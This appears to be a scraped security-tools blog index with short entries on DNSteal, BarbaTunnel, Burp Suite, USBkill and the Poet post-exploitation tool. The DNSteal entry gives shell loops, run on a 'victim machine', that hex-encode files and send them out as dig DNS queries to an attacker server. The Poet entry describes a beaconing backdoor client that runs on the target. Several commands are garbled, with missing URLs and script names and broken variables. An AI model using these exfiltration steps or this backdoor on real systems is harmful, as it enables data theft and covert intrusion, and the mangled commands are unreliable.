data exfiltration – DNSteal


Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Install & start server
git clone /opt/dnsteal
Git clone printscreen

cd /opt/dnsteal && python
DNSteal running

Transfer file from the victim
On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $; done

On the server side you will see the file transfer start:
When the transfer is finished you must stop the server with CTRL-C to save the file and view the md5sum
You can verify the md5sum on the victims machine by running
md5sum filename


Support for multiple files
Dnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$; done; done
gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
python –z

Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $; done

For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$; done; done


firewall evasion – BarbaTunnel


BarbaTunnel is software that helps you to bypass firewall and internet censorship, it is a Peer to Peer tunnel so you need a server outside of firewall network. In most case you can simply use VPN or any proxies but when you use VPN, firewall knows that you use a VPN, it does not know what you do, VPN and some other proxies does not hide their fingerprint. BarbaTunnel is a layer on your network and try to make existing VPN packets look at traditional packets. Actually BarbaTunnel does not work alone and it work with VPN. So if you have VPN and you don’t have any issue with it, you do not need BarbaTunnel, but if the firewall blocks your VPN connection or your VPN connection speed decreased by firewall, BarbaTunnel may helpful for you.

Attention: BarbaTunnel is not standalone tunnel and you should run a tunnel application or use a standard VPN connection after running BarbaTunnel.


BarbaTunnel requires .NET Framework 4.5 for “Barba Monitor” and “Barba Service”, but BarbaTunnel.exe does not need .NET Framework, so you can run it manually on both client and server side without .NET Framework.
Configure Server

Login to your Windows Server.
Download BarbaTunnel and extract it.
Open “barbatunnel.ini” in BarbaTunnel folder and set “ServerMode=1”
Go to BarbaTunnel folder and open “config\servername” folder then open “HTTP-Retunnel.ini” file.
Set “ServerAddress” to your server ip address (required).
Run “Install.vbs”
Run “Run.Vbs”
Server already configured for specific ports, for custom configuration see “config.ini”.
Configure Client Machine

Login to your Windows Client.
Download BarbaTunnel and extract it.
Copy “config” folder and its config files that you have already created them in the server machine.
Run “Install.vbs”
Run “Run.Vbs”
Try to establish a VPN connection to your server

It is recommended to rename “servername” folder to your server name or server ip (optional).
Ensure the major version of BarbaServer and BarbaClient is same. Such 1.0 and 1.1
Make sure both server config file and client config file is same.
Make sure the enterprise firewall does not block tunnel ports.
Make sure your Local Firewall such as Windows Firewall does not block tunnel ports or BarbaTunnel.
Make sure you have access to reboot your system if you lose the connection to your server, before run BarbaTunnel you can create a timer-job to restart your server if you have limited access to your server reboot.


Pentest tools – Burp Suite Professional v1.6.23

Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
Release Notes


This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

The release also fixes some issues:

Some bugs affecting the saving and restoring of Burp state files.
A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.


python – USBkill anti-forensic usb killswitch


USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer (or execute some commands self-destruct and shutdown your computer).

To install dependencies:
sudo apt-get update
sudo apt-get install python2.7
sudo apt-get install secure-delete

To run:
sudo python

Some reasons to use this tool:

You don’t want someone to retrieve documents from your computer or install malware/backdoors via USB.
You want to improve the security of your full disk encrypted home or corporate server.

Important: Make sure to use disk encryption! Otherwise they will get in anyway.
Continue reading python – USBkill anti-forensic usb killswitch


python – poet post-exploitation tool


This program can be used in the post-exploration stage. You can run the client in a deamonized mode on the target with a frequency to connect at. Whenever the server isn’t running, the client sleeps and tries again at the next interval. When you start the server, you will be presented with a control shell with various commands / actions to choose from.

Poet Capture help
Poet help

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it’s pretty easy). Make sure you have the python2.7 and zip executables available.
git clone
cd poet

This will create a bin/ directory which contains poet-client and poet-server.
Continue reading python – poet post-exploitation tool

This site uses cookies. Find out more about this site’s cookies.